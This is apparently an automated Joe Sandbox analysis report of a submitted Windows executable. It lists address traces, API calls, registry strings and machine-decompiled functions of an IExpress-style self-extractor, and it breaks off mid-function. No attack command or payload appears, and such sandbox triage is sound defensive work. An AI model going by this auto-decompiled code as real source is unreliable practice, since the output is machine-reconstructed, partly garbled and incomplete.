                                                                                                                                                                                                                                            0x008d44eb
                                                                                                                                                                                                                                            0x008d44ee
                                                                                                                                                                                                                                            0x008d44ef
                                                                                                                                                                                                                                            0x008d44ef
                                                                                                                                                                                                                                            0x008d44f1
                                                                                                                                                                                                                                            0x008d44f7
                                                                                                                                                                                                                                            0x008d44f8
                                                                                                                                                                                                                                            0x008d467b
                                                                                                                                                                                                                                            0x008d44fe
                                                                                                                                                                                                                                            0x008d4509
                                                                                                                                                                                                                                            0x008d4518
                                                                                                                                                                                                                                            0x008d4525
                                                                                                                                                                                                                                            0x008d4562
                                                                                                                                                                                                                                            0x008d4568
                                                                                                                                                                                                                                            0x008d4568
                                                                                                                                                                                                                                            0x008d456b
                                                                                                                                                                                                                                            0x008d456b
                                                                                                                                                                                                                                            0x008d456d
                                                                                                                                                                                                                                            0x008d456e
                                                                                                                                                                                                                                            0x008d4572
                                                                                                                                                                                                                                            0x008d4578
                                                                                                                                                                                                                                            0x008d457c
                                                                                                                                                                                                                                            0x008d45cb
                                                                                                                                                                                                                                            0x008d4607
                                                                                                                                                                                                                                            0x008d4607
                                                                                                                                                                                                                                            0x008d460d
                                                                                                                                                                                                                                            0x008d4613
                                                                                                                                                                                                                                            0x008d4617
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d461d
                                                                                                                                                                                                                                            0x008d4623
                                                                                                                                                                                                                                            0x008d4626
                                                                                                                                                                                                                                            0x008d4628
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4628
                                                                                                                                                                                                                                            0x008d45cd
                                                                                                                                                                                                                                            0x008d45cd
                                                                                                                                                                                                                                            0x008d45cf
                                                                                                                                                                                                                                            0x008d45cf
                                                                                                                                                                                                                                            0x008d45d2
                                                                                                                                                                                                                                            0x008d45d2
                                                                                                                                                                                                                                            0x008d45d4
                                                                                                                                                                                                                                            0x008d45d5
                                                                                                                                                                                                                                            0x008d45db
                                                                                                                                                                                                                                            0x008d45de
                                                                                                                                                                                                                                            0x008d45e3
                                                                                                                                                                                                                                            0x008d45e9
                                                                                                                                                                                                                                            0x008d45ed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d45f3
                                                                                                                                                                                                                                            0x008d45fd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4602
                                                                                                                                                                                                                                            0x008d45ed
                                                                                                                                                                                                                                            0x008d457e
                                                                                                                                                                                                                                            0x008d457e
                                                                                                                                                                                                                                            0x008d4580
                                                                                                                                                                                                                                            0x008d4580
                                                                                                                                                                                                                                            0x008d4583
                                                                                                                                                                                                                                            0x008d4583
                                                                                                                                                                                                                                            0x008d4585
                                                                                                                                                                                                                                            0x008d4586
                                                                                                                                                                                                                                            0x008d458a
                                                                                                                                                                                                                                            0x008d458c
                                                                                                                                                                                                                                            0x008d458f
                                                                                                                                                                                                                                            0x008d458f
                                                                                                                                                                                                                                            0x008d4591
                                                                                                                                                                                                                                            0x008d4592
                                                                                                                                                                                                                                            0x008d459b
                                                                                                                                                                                                                                            0x008d459e
                                                                                                                                                                                                                                            0x008d45a3
                                                                                                                                                                                                                                            0x008d45a9
                                                                                                                                                                                                                                            0x008d45ad
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d45af
                                                                                                                                                                                                                                            0x008d45af
                                                                                                                                                                                                                                            0x008d45bf
                                                                                                                                                                                                                                            0x008d462d
                                                                                                                                                                                                                                            0x008d4630
                                                                                                                                                                                                                                            0x008d463d
                                                                                                                                                                                                                                            0x008d464e
                                                                                                                                                                                                                                            0x008d464e
                                                                                                                                                                                                                                            0x008d463f
                                                                                                                                                                                                                                            0x008d4640
                                                                                                                                                                                                                                            0x008d4647
                                                                                                                                                                                                                                            0x008d464c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d464c
                                                                                                                                                                                                                                            0x008d4666
                                                                                                                                                                                                                                            0x008d466d
                                                                                                                                                                                                                                            0x008d466f
                                                                                                                                                                                                                                            0x008d4675
                                                                                                                                                                                                                                            0x008d4675
                                                                                                                                                                                                                                            0x008d45ad
                                                                                                                                                                                                                                            0x008d4527
                                                                                                                                                                                                                                            0x008d452e
                                                                                                                                                                                                                                            0x008d453f
                                                                                                                                                                                                                                            0x008d453f
                                                                                                                                                                                                                                            0x008d4530
                                                                                                                                                                                                                                            0x008d4531
                                                                                                                                                                                                                                            0x008d4538
                                                                                                                                                                                                                                            0x008d453d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d453d
                                                                                                                                                                                                                                            0x008d4554
                                                                                                                                                                                                                                            0x008d455a
                                                                                                                                                                                                                                            0x008d455a
                                                                                                                                                                                                                                            0x008d455a
                                                                                                                                                                                                                                            0x008d4525
                                                                                                                                                                                                                                            0x008d468c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 008D45A3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 008D45E3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000002), ref: 008D460D
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 008D4630
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 008D4666
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 008D466F
                                                                                                                                                                                                                                              • Part of subcall function 008D681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 008D686E
                                                                                                                                                                                                                                              • Part of subcall function 008D681F: GetSystemMetrics.USER32(0000004A), ref: 008D68A7
                                                                                                                                                                                                                                              • Part of subcall function 008D681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 008D68CC
                                                                                                                                                                                                                                              • Part of subcall function 008D681F: RegQueryValueExA.ADVAPI32(?,008D1140,00000000,?,?,0000000C), ref: 008D68F4
                                                                                                                                                                                                                                              • Part of subcall function 008D681F: RegCloseKey.ADVAPI32(?), ref: 008D6902
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                            • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                            • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                            • Opcode ID: 247fcc36ec4ffb2069b000571038f7f947bb3ffda49b11558bb0ca9e20c6dd49
                                                                                                                                                                                                                                            • Instruction ID: c23c3a9fa8f34b423701a9ddffa5f3dd2ece04f0eaec2f4b93298c1511c95cd1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 247fcc36ec4ffb2069b000571038f7f947bb3ffda49b11558bb0ca9e20c6dd49
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7351DF72901219ABDF219F68EC48BAA7B78FF45300F104396E95AE7345DB32DE058B60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E008D53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				long _t13;
                                                                                                                                                                                                                                            				int _t14;
                                                                                                                                                                                                                                            				CHAR* _t20;
                                                                                                                                                                                                                                            				int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				CHAR* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                            				_t32 = __edx;
                                                                                                                                                                                                                                            				_t20 = __ecx;
                                                                                                                                                                                                                                            				_t29 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E008D171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                            					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                            					_t29 = _t29 + 1;
                                                                                                                                                                                                                                            					E008D1680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                            					E008D658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                            					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                            					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                            					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t29 < 0x190) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t30 = 0;
                                                                                                                                                                                                                                            					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                            						_t30 = 1;
                                                                                                                                                                                                                                            						DeleteFileA(_t32);
                                                                                                                                                                                                                                            						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return E008D6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t30 = 1;
                                                                                                                                                                                                                                            				 *0x8d8a20 = 1;
                                                                                                                                                                                                                                            				goto L5;
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            0x008d53ac
                                                                                                                                                                                                                                            0x008d53b3
                                                                                                                                                                                                                                            0x008d53b9
                                                                                                                                                                                                                                            0x008d53bb
                                                                                                                                                                                                                                            0x008d53bd
                                                                                                                                                                                                                                            0x008d53bf
                                                                                                                                                                                                                                            0x008d53d1
                                                                                                                                                                                                                                            0x008d53d6
                                                                                                                                                                                                                                            0x008d53e0
                                                                                                                                                                                                                                            0x008d53e2
                                                                                                                                                                                                                                            0x008d53f5
                                                                                                                                                                                                                                            0x008d53fb
                                                                                                                                                                                                                                            0x008d5402
                                                                                                                                                                                                                                            0x008d540b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5413
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5415
                                                                                                                                                                                                                                            0x008d5416
                                                                                                                                                                                                                                            0x008d5427
                                                                                                                                                                                                                                            0x008d542a
                                                                                                                                                                                                                                            0x008d542b
                                                                                                                                                                                                                                            0x008d5434
                                                                                                                                                                                                                                            0x008d5434
                                                                                                                                                                                                                                            0x008d543a
                                                                                                                                                                                                                                            0x008d544c
                                                                                                                                                                                                                                            0x008d544c
                                                                                                                                                                                                                                            0x008d5452
                                                                                                                                                                                                                                            0x008d545a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d545e
                                                                                                                                                                                                                                            0x008d545f
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D171E: _vsnprintf.MSVCRT ref: 008D1750
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D53FB
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D5402
                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D541F
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D542B
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D5434
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D5452
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                            • API String ID: 1082909758-775753704
                                                                                                                                                                                                                                            • Opcode ID: d1ca39bb1e3b5a69fcd9e21883d63b4ee1e6591a952313df3395ce93b007ea94
                                                                                                                                                                                                                                            • Instruction ID: 552850cad453fab06808036ee69bce62fa749747534aeb4b8140aa8e5c04ac31
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1ca39bb1e3b5a69fcd9e21883d63b4ee1e6591a952313df3395ce93b007ea94
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52112271302904B7D724AB269C08FAF376DFFC1321F100327B506C2390DE748D8286A6
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 563 8d256d-8d257d 564 8d2583-8d2589 563->564 565 8d2622-8d2627 call 8d24e0 563->565 566 8d25e8-8d2607 RegOpenKeyExA 564->566 567 8d258b 564->567 569 8d2629-8d262f 565->569 571 8d2609-8d2620 RegQueryInfoKeyA 566->571 572 8d25e3-8d25e6 566->572 567->569 570 8d2591-8d2595 567->570 570->569 574 8d259b-8d25ba RegOpenKeyExA 570->574 575 8d25d1-8d25dd RegCloseKey 571->575 572->569 574->572 576 8d25bc-8d25cb RegQueryValueExA 574->576 575->572 576->575
                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E008D256D(signed int __ecx) {
                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                            				int _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                            				_t31 = 0;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t31 = E008D24E0(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t34 = _t13 - 1;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						_v8 = 0;
                                                                                                                                                                                                                                            						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                            							_v8 = 0;
                                                                                                                                                                                                                                            							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                            							if(_t24 == 0) {
                                                                                                                                                                                                                                            								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                            								L6:
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                            								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							_t31 = _v8;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t31;
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x008d2572
                                                                                                                                                                                                                                            0x008d2573
                                                                                                                                                                                                                                            0x008d2575
                                                                                                                                                                                                                                            0x008d2578
                                                                                                                                                                                                                                            0x008d257d
                                                                                                                                                                                                                                            0x008d2627
                                                                                                                                                                                                                                            0x008d2583
                                                                                                                                                                                                                                            0x008d2586
                                                                                                                                                                                                                                            0x008d2589
                                                                                                                                                                                                                                            0x008d25eb
                                                                                                                                                                                                                                            0x008d2607
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2609
                                                                                                                                                                                                                                            0x008d261a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d261a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d258b
                                                                                                                                                                                                                                            0x008d258b
                                                                                                                                                                                                                                            0x008d259e
                                                                                                                                                                                                                                            0x008d25b2
                                                                                                                                                                                                                                            0x008d25ba
                                                                                                                                                                                                                                            0x008d25cb
                                                                                                                                                                                                                                            0x008d25d1
                                                                                                                                                                                                                                            0x008d25d6
                                                                                                                                                                                                                                            0x008d25da
                                                                                                                                                                                                                                            0x008d25dd
                                                                                                                                                                                                                                            0x008d25dd
                                                                                                                                                                                                                                            0x008d25e3
                                                                                                                                                                                                                                            0x008d25e3
                                                                                                                                                                                                                                            0x008d25e3
                                                                                                                                                                                                                                            0x008d258b
                                                                                                                                                                                                                                            0x008d2589
                                                                                                                                                                                                                                            0x008d262f
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,008D4096,008D4096,?,008D1ED3,00000001,00000000,?,?,008D4137,?), ref: 008D25B2
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,008D4096,?,008D1ED3,00000001,00000000,?,?,008D4137,?,008D4096), ref: 008D25CB
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,008D1ED3,00000001,00000000,?,?,008D4137,?,008D4096), ref: 008D25DD
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,008D4096,008D4096,?,008D1ED3,00000001,00000000,?,?,008D4137,?), ref: 008D25FF
                                                                                                                                                                                                                                            • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,008D4096,00000000,00000000,00000000,00000000,?,008D1ED3,00000001,00000000), ref: 008D261A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 008D25C3
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 008D25F5
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager, xrefs: 008D25A8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                            • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                            • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                            • Opcode ID: 425bd8cdc7b546bebacf03b20bcacf97a506f77127925058996924da996357be
                                                                                                                                                                                                                                            • Instruction ID: 157c26c4f19d52644bc46741f746f4a9b2126a69d0b5872b3ec3c25937c54c63
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 425bd8cdc7b546bebacf03b20bcacf97a506f77127925058996924da996357be
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09115435942228FB9B249B92AC09DFF7F7CFF657A1F104257B808E2250D6309E44D6A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 577 8d6a60-8d6a91 call 8d7155 call 8d7208 GetStartupInfoW 583 8d6a93-8d6aa2 577->583 584 8d6abc-8d6abe 583->584 585 8d6aa4-8d6aa6 583->585 588 8d6abf-8d6ac5 584->588 586 8d6aaf-8d6aba Sleep 585->586 587 8d6aa8-8d6aad 585->587 586->583 587->588 589 8d6ac7-8d6acf _amsg_exit 588->589 590 8d6ad1-8d6ad7 588->590 591 8d6b0b-8d6b11 589->591 592 8d6ad9-8d6ae9 call 8d6c3f 590->592 593 8d6b05 590->593 594 8d6b2e-8d6b30 591->594 595 8d6b13-8d6b24 _initterm 591->595 599 8d6aee-8d6af2 592->599 593->591 597 8d6b3b-8d6b42 594->597 598 8d6b32-8d6b39 594->598 595->594 600 8d6b44-8d6b51 call 8d7060 597->600 601 8d6b67-8d6b71 597->601 598->597 599->591 602 8d6af4-8d6b00 599->602 600->601 613 8d6b53-8d6b65 600->613 605 8d6b74-8d6b79 601->605 603 8d6c39-8d6c3e call 8d724d 602->603 608 8d6b7b-8d6b7d 605->608 609 8d6bc5-8d6bc8 605->609 610 8d6b7f-8d6b81 608->610 611 8d6b94-8d6b98 608->611 614 8d6bca-8d6bd3 609->614 615 8d6bd6-8d6be3 _ismbblead 609->615 610->609 616 8d6b83-8d6b85 610->616 617 8d6b9a-8d6b9e 611->617 618 8d6ba0-8d6ba2 611->618 613->601 614->615 619 8d6be9-8d6bed 615->619 620 8d6be5-8d6be6 615->620 616->611 622 8d6b87-8d6b8a 616->622 623 8d6ba3-8d6bbc call 8d2bfb 617->623 618->623 619->605 621 8d6c1e-8d6c25 619->621 620->619 625 8d6c27-8d6c2d _cexit 621->625 626 8d6c32 621->626 622->611 627 8d6b8c-8d6b92 622->627 623->621 630 8d6bbe-8d6bbf exit 623->630 625->626 626->603 627->616 630->609
                                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                                            			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int* _t25;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed char _t41;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				E008D7155();
                                                                                                                                                                                                                                            				_push(0x58);
                                                                                                                                                                                                                                            				_push(0x8d72b8);
                                                                                                                                                                                                                                            				E008D7208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                            				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                            				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                            				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                            				_t53 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                            					if(0 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(0 != _t56) {
                                                                                                                                                                                                                                            						Sleep(0x3e8);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t58 = 1;
                                                                                                                                                                                                                                            						_t53 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_t67 =  *0x8d88b0 - _t58; // 0x2
                                                                                                                                                                                                                                            					if(_t67 != 0) {
                                                                                                                                                                                                                                            						__eflags =  *0x8d88b0; // 0x2
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							 *0x8d81e4 = _t58;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0x8d88b0 = _t58;
                                                                                                                                                                                                                                            							_t37 = E008D6C3F(0x8d10b8, 0x8d10c4); // executed
                                                                                                                                                                                                                                            							__eflags = _t37;
                                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                                            								goto L13;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            								_t30 = 0xff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(0x1f);
                                                                                                                                                                                                                                            						L008D6FF4();
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t68 =  *0x8d88b0 - _t58; // 0x2
                                                                                                                                                                                                                                            						if(_t68 == 0) {
